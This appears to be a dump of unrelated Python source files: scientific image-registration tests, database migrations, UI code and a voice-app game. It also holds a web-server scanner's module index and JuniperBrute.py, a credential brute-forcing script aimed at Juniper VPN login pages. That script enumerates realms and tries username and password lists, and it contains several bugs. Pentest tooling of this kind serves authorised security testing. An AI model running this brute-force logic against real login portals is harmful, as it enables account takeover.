# uses resource_id if it's available and unique
resource_id = info['resourceName']
if resource_id and unique(resourceId=resource_id):
return UiObjectLocator(filters={'resourceId': resource_id})
# uses content-desc if it's available
content_desc = info['contentDescription']
if content_desc and unique(description=content_desc):
return UiObjectLocator(filters={'description': content_desc})
# uses text if it's available
if info['text'] and unique(text=info['text']):
return UiObjectLocator(filters={'text': info['text']})
# uses text if it's available
class_name = info['className']
if class_name and unique(className=class_name):
return UiObjectLocator(filters={'className': class_name})
return None
|
tksn/phoneauto
|
phoneauto/scriptgenerator/uiobjectfinder.py
|
Python
|
mit
| 5,775
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Spaghetti: Web Server Security Scanner
#
# @url: https://github.com/m4ll0k/Spaghetti
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'doc/LICENSE'
import AdminInterfaces
import AllowMethod
import ApacheUsers
import ApacheXss
import Backdoor
import Backup
import Captcha
import ClientAccessPolicy
import CommonDirectory
import CommonFile
import Cookie
import HtmlObject
import LDAPInjection
import ModStatus
import Email
import MultiIndex
import PrivateIP
import Robots
def All(url,agent,proxy,redirect):
Cookie.Cookie(url,agent,proxy,redirect).Run()
AllowMethod.AllowMethod(url,agent,proxy,redirect).Run()
Robots.Robots(url,agent,proxy,redirect).Run()
ClientAccessPolicy.ClientAccessPolicy(url,agent,proxy,redirect).Run()
PrivateIP.PrivateIP(url,agent,proxy,redirect).Run()
Email.Email(url,agent,proxy,redirect).Run()
MultiIndex.MultiIndex(url,agent,proxy,redirect).Run()
Captcha.Captcha(url,agent,proxy,redirect).Run()
ApacheUsers.ApacheUsers(url,agent,proxy,redirect).Run()
ApacheXss.ApacheXss(url,agent,proxy,redirect).Run()
HtmlObject.HtmlObject(url,agent,proxy,redirect).Run()
LDAPInjection.LDAPInjection(url,agent,proxy,redirect).Run()
ModStatus.ModStatus(url,agent,proxy,redirect).Run()
AdminInterfaces.AdminInterfaces(url,agent,proxy,redirect).Run()
Backdoor.Backdoors(url,agent,proxy,redirect).Run()
Backup.Backup(url,agent,proxy,redirect).Run()
CommonDirectory.CommonDirectory(url,agent,proxy,redirect).Run()
CommonFile.CommonFile(url,agent,proxy,redirect).Run()
def AdminInterface(url,agent,proxy,redirect):
AdminInterfaces.AdminInterfaces(url,agent,proxy,redirect).Run()
def Misconfiguration(url,agent,proxy,redirect):
MultiIndex.MultiIndex(url,agent,proxy,redirect).Run()
ModStatus.ModStatus(url,agent,proxy,redirect).Run()
Backdoor.Backdoors(url,agent,proxy,redirect).Run()
Backup.Backup(url,agent,proxy,redirect).Run()
CommonDirectory.CommonDirectory(url,agent,proxy,redirect).Run()
CommonFile.CommonFile(url,agent,proxy,redirect).Run()
def InfoDisclosure(url,agent,proxy,redirect):
Robots.Robots(url,agent,proxy,redirect).Run()
ClientAccessPolicy.ClientAccessPolicy(url,agent,proxy,redirect).Run()
PrivateIP.PrivateIP(url,agent,proxy,redirect).Run()
Email.Email(url,agent,proxy,redirect).Run()
|
Yukinoshita47/Yuki-Chan-The-Auto-Pentest
|
Module/Spaghetti/modules/discovery/All.py
|
Python
|
mit
| 2,310
|
from local import *
DEBUG = True
OFFLINE_MODE = True
INTERNAL_IPS = ('127.0.0.1',)
EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'
EMAIL_FILE_PATH = '/tmp/tola-messages'
|
open-build/TolaActivity
|
tola/settings/dev.py
|
Python
|
gpl-2.0
| 192
|
import numpy as np
import scipy as sp
import nibabel as nib
from numpy.testing import (assert_array_equal,
assert_array_almost_equal,
assert_almost_equal,
assert_equal)
from dipy.core import geometry as geometry
from dipy.data import get_data
from dipy.viz import regtools as rt
from dipy.align import floating
from dipy.align import vector_fields as vf
from dipy.align import imaffine
from dipy.align.transforms import (Transform,
regtransforms)
from dipy.align.tests.test_parzenhist import (setup_random_transform,
sample_domain_regular)
# For each transform type, select a transform factor (indicating how large the
# true transform between static and moving images will be), a sampling scheme
# (either a positive integer less than or equal to 100, or None) indicating
# the percentage (if int) of voxels to be used for estimating the joint PDFs,
# or dense sampling (if None), and also specify a starting point (to avoid
# starting from the identity)
factors = {('TRANSLATION', 2): (2.0, 0.35, np.array([2.3, 4.5])),
('ROTATION', 2): (0.1, None, np.array([0.1])),
('RIGID', 2): (0.1, .50, np.array([0.12, 1.8, 2.7])),
('SCALING', 2): (0.01, None, np.array([1.05])),
('AFFINE', 2): (0.1, .50, np.array([0.99, -0.05, 1.3, 0.05, 0.99, 2.5])),
('TRANSLATION', 3): (2.0, None, np.array([2.3, 4.5, 1.7])),
('ROTATION', 3): (0.1, 1.0, np.array([0.1, 0.15, -0.11])),
('RIGID', 3): (0.1, None, np.array([0.1, 0.15, -0.11, 2.3, 4.5, 1.7])),
('SCALING', 3): (0.1, .35, np.array([0.95])),
('AFFINE', 3): (0.1, None, np.array([0.99, -0.05, 0.03, 1.3,
0.05, 0.99, -0.10, 2.5,
-0.07, 0.10, 0.99, -1.4]))}
def test_align_centers_of_mass_3d():
np.random.seed(1246592)
shape = (64, 64, 64)
rm = 8
sp = vf.create_sphere(shape[0]//2, shape[1]//2, shape[2]//2, rm)
moving = np.zeros(shape)
# The center of mass will be (16, 16, 16), in image coordinates
moving[:shape[0]//2, :shape[1]//2, :shape[2]//2] = sp[...]
rs = 16
# The center of mass will be (32, 32, 32), in image coordinates
static = vf.create_sphere(shape[0], shape[1], shape[2], rs)
# Create arbitrary image-to-space transforms
axis = np.array([.5, 2.0, 1.5])
t = 0.15 #translation factor
trans = np.array([[1, 0, 0, -t*shape[0]],
[0, 1, 0, -t*shape[1]],
[0, 0, 1, -t*shape[2]],
[0, 0, 0, 1]])
trans_inv = np.linalg.inv(trans)
for rotation_angle in [-1 * np.pi/6.0, 0.0, np.pi/5.0]:
for scale_factor in [0.83, 1.3, 2.07]: #scale
rot = np.zeros(shape=(4,4))
rot[:3, :3] = geometry.rodrigues_axis_rotation(axis,
rotation_angle)
rot[3,3] = 1.0
scale = np.array([[1 * scale_factor, 0, 0, 0],
[0, 1 * scale_factor, 0, 0],
[0, 0, 1 * scale_factor, 0],
[0, 0, 0, 1]])
static_grid2world = trans_inv.dot(scale.dot(rot.dot(trans)))
moving_grid2world = np.linalg.inv(static_grid2world)
# Expected translation
c_static = static_grid2world.dot((32, 32, 32, 1))[:3]
c_moving = moving_grid2world.dot((16, 16, 16, 1))[:3]
expected = np.eye(4);
expected[:3, 3] = c_moving - c_static
# Implementation under test
actual = imaffine.align_centers_of_mass(static, static_grid2world,
moving, moving_grid2world)
assert_array_almost_equal(actual.affine, expected)
def test_align_geometric_centers_3d():
# Create arbitrary image-to-space transforms
axis = np.array([.5, 2.0, 1.5])
t = 0.15 #translation factor
for theta in [-1 * np.pi/6.0, 0.0, np.pi/5.0]: #rotation angle
for s in [0.83, 1.3, 2.07]: #scale
m_shapes = [(256, 256, 128), (255, 255, 127), (64, 127, 142)]
for shape_moving in m_shapes:
s_shapes = [(256, 256, 128), (255, 255, 127), (64, 127, 142)]
for shape_static in s_shapes:
moving = np.ndarray(shape=shape_moving)
static = np.ndarray(shape=shape_static)
trans = np.array([[1, 0, 0, -t*shape_static[0]],
[0, 1, 0, -t*shape_static[1]],
[0, 0, 1, -t*shape_static[2]],
[0, 0, 0, 1]])
trans_inv = np.linalg.inv(trans)
rot = np.zeros(shape=(4,4))
rot[:3, :3] = geometry.rodrigues_axis_rotation(axis, theta)
rot[3,3] = 1.0
scale = np.array([[1 * s, 0, 0, 0],
[0, 1 * s, 0, 0],
[0, 0, 1 * s, 0],
[0, 0, 0, 1]])
static_grid2world = trans_inv.dot(scale.dot(rot.dot(trans)))
moving_grid2world = np.linalg.inv(static_grid2world)
# Expected translation
c_static = np.array(shape_static, dtype = np.float64) * 0.5
c_static = tuple(c_static)
c_static = static_grid2world.dot(c_static+(1,))[:3]
c_moving = np.array(shape_moving, dtype = np.float64) * 0.5
c_moving = tuple(c_moving)
c_moving = moving_grid2world.dot(c_moving+(1,))[:3]
expected = np.eye(4);
expected[:3, 3] = c_moving - c_static
# Implementation under test
actual = imaffine.align_geometric_centers(static,
static_grid2world, moving, moving_grid2world)
assert_array_almost_equal(actual.affine, expected)
def test_align_origins_3d():
# Create arbitrary image-to-space transforms
axis = np.array([.5, 2.0, 1.5])
t = 0.15 #translation factor
for theta in [-1 * np.pi/6.0, 0.0, np.pi/5.0]: #rotation angle
for s in [0.83, 1.3, 2.07]: #scale
m_shapes = [(256, 256, 128), (255, 255, 127), (64, 127, 142)]
for shape_moving in m_shapes:
s_shapes = [(256, 256, 128), (255, 255, 127), (64, 127, 142)]
for shape_static in s_shapes:
moving = np.ndarray(shape=shape_moving)
static = np.ndarray(shape=shape_static)
trans = np.array([[1, 0, 0, -t*shape_static[0]],
[0, 1, 0, -t*shape_static[1]],
[0, 0, 1, -t*shape_static[2]],
[0, 0, 0, 1]])
trans_inv = np.linalg.inv(trans)
rot = np.zeros(shape=(4,4))
rot[:3, :3] = geometry.rodrigues_axis_rotation(axis, theta)
rot[3,3] = 1.0
scale = np.array([[1*s, 0, 0, 0],
[0, 1*s, 0, 0],
[0, 0, 1*s, 0],
[0, 0, 0, 1]])
static_grid2world = trans_inv.dot(scale.dot(rot.dot(trans)))
moving_grid2world = np.linalg.inv(static_grid2world)
# Expected translation
c_static = static_grid2world[:3, 3]
c_moving = moving_grid2world[:3, 3]
expected = np.eye(4);
expected[:3, 3] = c_moving - c_static
# Implementation under test
actual = imaffine.align_origins(static, static_grid2world,
moving, moving_grid2world)
assert_array_almost_equal(actual.affine, expected)
def test_affreg_all_transforms():
# Test affine registration using all transforms with typical settings
# Make sure dictionary entries are processed in the same order regardless of
# the platform. Otherwise any random numbers drawn within the loop would make
# the test non-deterministic even if we fix the seed before the loop.
# Right now, this test does not draw any samples, but we still sort the entries
# to prevent future related failures.
for ttype in sorted(factors):
dim = ttype[1]
if dim == 2:
nslices = 1
else:
nslices = 45
factor = factors[ttype][0]
sampling_pc = factors[ttype][1]
transform = regtransforms[ttype]
static, moving, static_grid2world, moving_grid2world, smask, mmask, T = \
setup_random_transform(transform, factor, nslices, 1.0)
# Sum of absolute differences
start_sad = np.abs(static - moving).sum()
metric = imaffine.MutualInformationMetric(32, sampling_pc)
affreg = imaffine.AffineRegistration(metric,
[10000, 1000, 100],
[3, 1, 0],
[4, 2, 1],
'L-BFGS-B',
None,
options=None)
x0 = transform.get_identity_parameters()
affine_map = affreg.optimize(static, moving, transform, x0,
static_grid2world, moving_grid2world)
transformed = affine_map.transform(moving)
# Sum of absolute differences
end_sad = np.abs(static - transformed).sum()
reduction = 1 - end_sad / start_sad
print("%s>>%f"%(ttype, reduction))
assert(reduction > 0.9)
def test_affreg_defaults():
# Test all default arguments with an arbitrary transform
# Select an arbitrary transform (all of them are already tested
# in test_affreg_all_transforms)
transform_name = 'TRANSLATION'
dim = 2
ttype = (transform_name, dim)
for starting_affine in ['mass', 'voxel-origin', 'centers', None]:
if dim == 2:
nslices = 1
else:
nslices = 45
factor = factors[ttype][0]
sampling_pc = factors[ttype][1]
transform = regtransforms[ttype]
id_param = transform.get_identity_parameters()
static, moving, static_grid2world, moving_grid2world, smask, mmask, T = \
setup_random_transform(transform, factor, nslices, 1.0)
# Sum of absolute differences
start_sad = np.abs(static - moving).sum()
metric = None
x0 = None
sigmas = None
scale_factors = None
level_iters = None
static_grid2world = None
moving_grid2world = None
for ss_sigma_factor in [1.0, None]:
affreg = imaffine.AffineRegistration(metric,
level_iters,
sigmas,
scale_factors,
'L-BFGS-B',
ss_sigma_factor,
options=None)
affine_map = affreg.optimize(static, moving, transform, x0,
static_grid2world, moving_grid2world,
starting_affine)
transformed = affine_map.transform(moving)
# Sum of absolute differences
end_sad = np.abs(static - transformed).sum()
reduction = 1 - end_sad / start_sad
print("%s>>%f"%(ttype, reduction))
assert(reduction > 0.9)
transformed_inv = affine_map.transform_inverse(static)
# Sum of absolute differences
end_sad = np.abs(moving - transformed_inv).sum()
reduction = 1 - end_sad / start_sad
print("%s>>%f"%(ttype, reduction))
assert(reduction > 0.9)
def test_mi_gradient():
np.random.seed(2022966)
# Test the gradient of mutual information
h = 1e-5
# Make sure dictionary entries are processed in the same order regardless of
# the platform. Otherwise any random numbers drawn within the loop would make
# the test non-deterministic even if we fix the seed before the loop:
# in this case the samples are drawn with `np.random.randn` below
for ttype in sorted(factors):
transform = regtransforms[ttype]
dim = ttype[1]
if dim == 2:
nslices = 1
else:
nslices = 45
factor = factors[ttype][0]
sampling_proportion = factors[ttype][1]
theta = factors[ttype][2]
# Start from a small rotation
start = regtransforms[('ROTATION', dim)]
nrot = start.get_number_of_parameters()
starting_affine = start.param_to_matrix(0.25 * np.random.randn(nrot))
# Get data (pair of images related to each other by an known transform)
static, moving, static_g2w, moving_g2w, smask, mmask, M = \
setup_random_transform(transform, factor, nslices, 2.0)
# Prepare a MutualInformationMetric instance
mi_metric = imaffine.MutualInformationMetric(32, sampling_proportion)
mi_metric.setup(transform, static, moving, starting_affine=starting_affine)
# Compute the gradient with the implementation under test
actual = mi_metric.gradient(theta)
# Compute the gradient using finite-diferences
n = transform.get_number_of_parameters()
expected = np.empty(n, dtype=np.float64)
val0 = mi_metric.distance(theta)
for i in range(n):
dtheta = theta.copy()
dtheta[i] += h
val1 = mi_metric.distance(dtheta)
expected[i] = (val1 - val0) / h
dp = expected.dot(actual)
enorm = np.linalg.norm(expected)
anorm = np.linalg.norm(actual)
nprod = dp / (enorm * anorm)
assert(nprod >= 0.99)
|
jyeatman/dipy
|
dipy/align/tests/test_imaffine.py
|
Python
|
bsd-3-clause
| 14,486
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""add ti job_id index
Revision ID: 947454bf1dff
Revises: bdaa763e6c56
Create Date: 2017-08-15 15:12:13.845074
"""
from alembic import op
# revision identifiers, used by Alembic.
revision = '947454bf1dff'
down_revision = 'bdaa763e6c56'
branch_labels = None
depends_on = None
def upgrade():
op.create_index('ti_job_id', 'task_instance', ['job_id'], unique=False)
def downgrade():
op.drop_index('ti_job_id', table_name='task_instance')
|
sid88in/incubator-airflow
|
airflow/migrations/versions/947454bf1dff_add_ti_job_id_index.py
|
Python
|
apache-2.0
| 1,261
|
#! /usr/bin/python
# Created by Kirk Hayes (l0gan) @kirkphayes
# Part of myBFF
from core.webModule import webModule
from requests import session
import requests
import re
from argparse import ArgumentParser
import random
class JuniperBrute(webModule):
def __init__(self, config, display, lock):
super(JuniperBrute, self).__init__(config, display, lock)
self.fingerprint="dana-na"
self.response="Success"
self.protocol="web"
ignore = ['tz_offset','btnSubmit']
URLS = []
nomfaurls = []
def urlCheck(self, config, c, URL):
print("[!] Checking for other logon pages...")
for n in range(1, 20):
URL = 'url_' + str(n)
u = c.get(config["HOST"] + '/dana-na/auth/' + URL + '/welcome.cgi', allow_redirects=False, verify=False)
if u.status_code == 200:
self.URLS.append(URL)
def MFACheck(self, c, config, URL):
print("[!] Checking to see if MultiFactor Authentication is required for " + URL + "...")
mfa = c.get(config["HOST"] + '/dana-na/auth/' + URL + '/welcome.cgi', allow_redirects=False, verify=False, proxies=proxy)
m = re.findall('<input (.*?)>', mfa.text, re.DOTALL)
n = re.findall('password', str(m))
o = re.search('Missing certificate', mfa.text)
if n.count("password") > 3:
print("[-] MultiFactor Authentication Required for " + URL + "!")
return True
elif o:
print("[-] MultiFactor Authentication Required for " + URL + "!")
return True
else:
print("[+] MultiFactor Authentication is not on. Continuing...")
self.nomfaurls.append(URL)
return False
def connectTest(self, config, payload, URL):
payoad = self.payload(config)
with session() as c:
requests.packages.urllib3.disable_warnings()
if 'url_default' in self.nomfaurls:
URL = 'url_default'
else:
URL = self.nomfaurls[0]
cpost = c.post(config["HOST"] + '/dana-na/auth/' + URL + '/login.cgi', data=payload, allow_redirects=False, verify=False, proxies=proxy)
m = re.search('p=user-confirm', str(cpost.headers))
if m:
print("[+] User Credentials Successful: " + config["USERNAME"] + ":" + config["PASSWORD"])
else:
print("[-] Login Failed for: " + config["USERNAME"] + ":" + config["PASSWORD"])
def payload(self, config):
with session() as c:
requests.packages.urllib3.disable_warnings()
cget = c.get(config["HOST"] + '/dana-na/auth/welcome.cgi', allow_redirects=True, verify=False)
if cget.cookies:
URL = cget.cookies['DSSIGNIN']
else:
URL = "url_default"
m = re.findall("<select id=(.*?)select>", cget.text, re.DOTALL)
n = re.findall("<option(.*?)>(.*?)</option>", str(m), re.DOTALL)
if n:
print("[!] The following realms are available: ")
for o in n:
print("[+] " + o[1])
realm = o[1]
else:
print("[+] No realms available...")
realm = ""
MFAused = self.MFACheck(c, config, URL)
#Check for existence of a second factor MFACheck()
#if MFACheck() returns TRUE, run urlCheck()
if MFAused:
self.urlCheck(config, c, URL)
for URL in self.URLS:
self.MFACheck(c, config, URL)
else:
self.nomfaurls.append('url_default')
if self.nomfaurls:
if config["PASS_FILE"]:
pass_lines = [pass_line.rstrip('\n') for pass_line in open(config["PASS_FILE"])]
for pass_line in pass_lines:
if config["UserFile"]:
lines = [line.rstrip('\n') for line in open(config["UserFile"])]
for line in lines:
config["USERNAME"] = line.strip('\n')
config["PASSWORD"] = pass_line.strip('\n')
payload = {
'tz_offset': '-360',
'username': config["USERNAME"],
'password': config["PASSWORD"],
'realm': realm,
'btnSubmit': 'Sign+In'
}
return payload
time.sleep(config["timeout"])
else:
config["PASSWORD"] = pass_line.strip('\n')
payload = {
'tz_offset': '-360',
'username': config["USERNAME"],
'password': config["PASSWORD"],
'realm': realm,
'btnSubmit': 'Sign+In'
}
self.connectTest(config, payload)
time.sleep(config["timeout"])
elif config["UserFile"]:
lines = [line.rstrip('\n') for line in open(config["UserFile"])]
for line in lines:
config["USERNAME"] = line.strip('\n')
payload = {
'tz_offset': '-360',
'username': config["USERNAME"],
'password': config["PASSWORD"],
'realm': realm,
'btnSubmit': 'Sign+In'
}
self.connectTest(config, payload)
else:
payload = {
'tz_offset': '-360',
'username': config["USERNAME"],
'password': config["PASSWORD"],
'realm': realm,
'btnSubmit': 'Sign+In'
}
self.connectTest(config, payload)
else:
print "[-] All pages require MFA. Aborting..."
|
MooseDojo/myBFF
|
modules/JuniperBrute.py
|
Python
|
mit
| 6,490
|
"""Add Brief.is_a_copy boolean, default False, nullable False
Revision ID: 890
Revises: 880
Create Date: 2017-06-01 11:24:53.346954
"""
# revision identifiers, used by Alembic.
revision = '900'
down_revision = '890'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('briefs', sa.Column('is_a_copy', sa.Boolean(), server_default=sa.text(u'false'), nullable=False))
def downgrade():
op.drop_column('briefs', 'is_a_copy')
|
alphagov/digitalmarketplace-api
|
migrations/versions/900_add_brief_is_a_copy.py
|
Python
|
mit
| 461
|
import logging
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session
import random
app = Flask(__name__)
ask = Ask(app, "/")
logging.getLogger("flask_ask").setLevel(logging.DEBUG)
@ask.launch
def welcome():
animals = ['cat','dog','cammel','bird','horse']
session.attributes['not_machted'] = animals
answer = list(animals)
answer += answer
random.shuffle(answer)
session.attributes['answer'] = answer
session.attributes['number_one'] = None
msg = render_template('welcome')
return question(msg)
@ask.intent("NumberIntent", convert={'number':int})
def next(number):
answer = session.attributes['answer']
number_one = session.attributes['number_one']
if number_one is None:
session.attributes['number_one'] = number
msg = render_template('next', number = number, animal = answer[number])
else:
if number == number_one:
msg = render_template('same')
else:
session.attributes['number_one'] = None
print(answer)
if answer[number] == answer[number_one]:
if answer[number] in session.attributes['not_machted']:
session.attributes['not_machted'].remove(answer[number])
if len(session.attributes['not_machted']) == 0:
msg = render_template('end', number = number, animal = answer[number])
return statement(msg)
else:
msg = render_template('win', number = number, animal = answer[number])
else:
msg = render_template('lose', number = number, animal = answer[number])
return question(msg)
if __name__ == '__main__':
app.run(debug=True)
|
horefice/alexa_matching_game
|
matching_game.py
|
Python
|
mit
| 1,766
|
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import math
import imath
import IECore
import Gaffer
import GafferUI
import GafferImage
import GafferImageUI
##########################################################################
# Metadata registration.
##########################################################################
Gaffer.Metadata.registerNode(
GafferImageUI.ImageView,
"nodeToolbar:bottom:type", "GafferUI.StandardNodeToolbar.bottom",
"toolbarLayout:customWidget:LeftSpacer:widgetType", "GafferImageUI.ImageViewUI._Spacer",
"toolbarLayout:customWidget:LeftSpacer:section", "Top",
"toolbarLayout:customWidget:LeftSpacer:index", 0,
"toolbarLayout:customWidget:StateWidget:widgetType", "GafferImageUI.ImageViewUI._StateWidget",
"toolbarLayout:customWidget:StateWidget:section", "Top",
"toolbarLayout:customWidget:StateWidget:index", -1,
"toolbarLayout:customWidget:RightSpacer:widgetType", "GafferImageUI.ImageViewUI._Spacer",
"toolbarLayout:customWidget:RightSpacer:section", "Top",
"toolbarLayout:customWidget:RightSpacer:index", -2,
"toolbarLayout:customWidget:BottomRightSpacer:widgetType", "GafferImageUI.ImageViewUI._Spacer",
"toolbarLayout:customWidget:BottomRightSpacer:section", "Bottom",
"toolbarLayout:customWidget:BottomRightSpacer:index", 2,
plugs = {
"clipping" : [
"description",
"""
Highlights the regions in which the colour values go above 1 or below 0.
""",
"plugValueWidget:type", "GafferImageUI.ImageViewUI._TogglePlugValueWidget",
"togglePlugValueWidget:imagePrefix", "clipping",
"togglePlugValueWidget:defaultToggleValue", True,
"toolbarLayout:divider", True,
],
"exposure" : [
"description",
"""
Applies an exposure adjustment to the image.
""",
"plugValueWidget:type", "GafferImageUI.ImageViewUI._TogglePlugValueWidget",
"togglePlugValueWidget:imagePrefix", "exposure",
"togglePlugValueWidget:defaultToggleValue", 1,
],
"gamma" : [
"description",
"""
Applies a gamma correction to the image.
""",
"plugValueWidget:type", "GafferImageUI.ImageViewUI._TogglePlugValueWidget",
"togglePlugValueWidget:imagePrefix", "gamma",
"togglePlugValueWidget:defaultToggleValue", 2,
],
"displayTransform" : [
"description",
"""
Applies colour space transformations for viewing the image correctly.
""",
"plugValueWidget:type", "GafferUI.PresetsPlugValueWidget",
"label", "",
"toolbarLayout:width", 100,
"presetNames", lambda plug : IECore.StringVectorData( GafferImageUI.ImageView.registeredDisplayTransforms() ),
"presetValues", lambda plug : IECore.StringVectorData( GafferImageUI.ImageView.registeredDisplayTransforms() ),
],
"colorInspector" : [
"plugValueWidget:type", "GafferImageUI.ImageViewUI._ColorInspectorPlugValueWidget",
"label", "",
"toolbarLayout:section", "Bottom",
"toolbarLayout:index", 1,
],
"channels" : [
"description",
"""
Chooses an RGBA layer or an auxiliary channel to display.
""",
"plugValueWidget:type", "GafferImageUI.RGBAChannelsPlugValueWidget",
"toolbarLayout:index", 1,
"toolbarLayout:width", 175,
"label", "",
],
"soloChannel" : [
"description",
"""
Chooses a channel to show in isolation.
""",
"plugValueWidget:type", "GafferImageUI.ImageViewUI._SoloChannelPlugValueWidget",
"toolbarLayout:index", 1,
"toolbarLayout:divider", True,
"label", "",
],
}
)
##########################################################################
# _TogglePlugValueWidget
##########################################################################
# Toggles between default value and the last non-default value
class _TogglePlugValueWidget( GafferUI.PlugValueWidget ) :
def __init__( self, plug, **kw ) :
row = GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 2 )
GafferUI.PlugValueWidget.__init__( self, row, plug, **kw )
self.__imagePrefix = Gaffer.Metadata.value( plug, "togglePlugValueWidget:imagePrefix" )
with row :
self.__button = GafferUI.Button( "", self.__imagePrefix + "Off.png", hasFrame=False )
self.__button.clickedSignal().connect( Gaffer.WeakMethod( self.__clicked ), scoped = False )
if not isinstance( plug, Gaffer.BoolPlug ) :
plugValueWidget = GafferUI.PlugValueWidget.create( plug, useTypeOnly=True )
plugValueWidget.numericWidget().setFixedCharacterWidth( 5 )
self.__toggleValue = Gaffer.Metadata.value( plug, "togglePlugValueWidget:defaultToggleValue" )
self._updateFromPlug()
def hasLabel( self ) :
return True
def getToolTip( self ) :
result = GafferUI.PlugValueWidget.getToolTip( self )
if result :
result += "\n"
result += "## Actions\n\n"
result += "- Click to toggle to/from default value\n"
return result
def _updateFromPlug( self ) :
with self.getContext() :
value = self.getPlug().getValue()
if value != self.getPlug().defaultValue() :
self.__toggleValue = value
self.__button.setImage( self.__imagePrefix + "On.png" )
else :
self.__button.setImage( self.__imagePrefix + "Off.png" )
self.setEnabled( self.getPlug().settable() )
def __clicked( self, button ) :
with self.getContext() :
value = self.getPlug().getValue()
if value == self.getPlug().defaultValue() and self.__toggleValue is not None :
self.getPlug().setValue( self.__toggleValue )
else :
self.getPlug().setToDefault()
##########################################################################
# _ColorInspectorPlugValueWidget
##########################################################################
class _ColorInspectorPlugValueWidget( GafferUI.PlugValueWidget ) :
def __init__( self, plug, **kw ) :
frame = GafferUI.Frame( borderWidth = 4 )
GafferUI.PlugValueWidget.__init__( self, frame, plug, **kw )
# Style selector specificity rules seem to preclude us styling this
# based on gafferClass.
frame._qtWidget().setObjectName( "gafferColorInspector" )
with frame :
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 ) :
GafferUI.Spacer( imath.V2i( 10 ), imath.V2i( 10 ) )
self.__positionLabel = GafferUI.Label()
self.__positionLabel._qtWidget().setFixedWidth( 90 )
self.__swatch = GafferUI.ColorSwatch()
self.__swatch._qtWidget().setFixedWidth( 12 )
self.__swatch._qtWidget().setFixedHeight( 12 )
self.__busyWidget = GafferUI.BusyWidget( size = 12 )
self.__rgbLabel = GafferUI.Label()
GafferUI.Spacer( imath.V2i( 20, 10 ), imath.V2i( 20, 10 ) )
self.__hsvLabel = GafferUI.Label()
GafferUI.Spacer( imath.V2i( 10 ), imath.V2i( 10 ) )
self.__pixel = imath.V2f( 0 )
viewportGadget = plug.parent().viewportGadget()
viewportGadget.mouseMoveSignal().connect( Gaffer.WeakMethod( self.__mouseMove ), scoped = False )
imageGadget = viewportGadget.getPrimaryChild()
imageGadget.buttonPressSignal().connect( Gaffer.WeakMethod( self.__buttonPress ), scoped = False )
imageGadget.dragBeginSignal().connect( Gaffer.WeakMethod( self.__dragBegin ), scoped = False )
imageGadget.dragEndSignal().connect( Gaffer.WeakMethod( self.__dragEnd ), scoped = False )
self.__updateLabels( imath.V2i( 0 ), imath.Color4f( 0, 0, 0, 1 ) )
def _updateFromPlug( self ) :
self.__updateLazily()
@GafferUI.LazyMethod()
def __updateLazily( self ) :
with self.getContext() :
self.__updateInBackground( self.__pixel )
@GafferUI.BackgroundMethod()
def __updateInBackground( self, pixel ) :
image = self.getPlug().node().viewportGadget().getPrimaryChild().getImage()
with Gaffer.Context( Gaffer.Context.current() ) as c :
c["colorInspector:pixel"] = pixel
samplerChannels = self.getPlug()["color"].getInput().node()["channels"].getValue()
channelNames = image["channelNames"].getValue()
color = self.getPlug()["color"].getValue()
if samplerChannels[3] not in channelNames :
color = imath.Color3f( color[0], color[1], color[2] )
return pixel, color
@__updateInBackground.preCall
def __updateInBackgroundPreCall( self ) :
self.__busyWidget.setBusy( True )
@__updateInBackground.postCall
def __updateInBackgroundPostCall( self, backgroundResult ) :
if isinstance( backgroundResult, IECore.Cancelled ) :
# Cancellation. This could be due to any of the
# following :
#
# - This widget being hidden.
# - A graph edit that will affect the image and will have
# triggered a call to _updateFromPlug().
# - A graph edit that won't trigger a call to _updateFromPlug().
#
# LazyMethod takes care of all this for us. If we're hidden,
# it waits till we're visible. If `updateFromPlug()` has already
# called `__updateLazily()`, our call will just replace the
# pending call.
self.__updateLazily()
return
elif isinstance( backgroundResult, Exception ) :
# Computation error. This will be reported elsewhere
# in the UI.
self.__updateLabels( self.__pixel, imath.Color4f( 0 ) )
else :
# Success. We have valid infomation to display.
self.__updateLabels( backgroundResult[0], backgroundResult[1] )
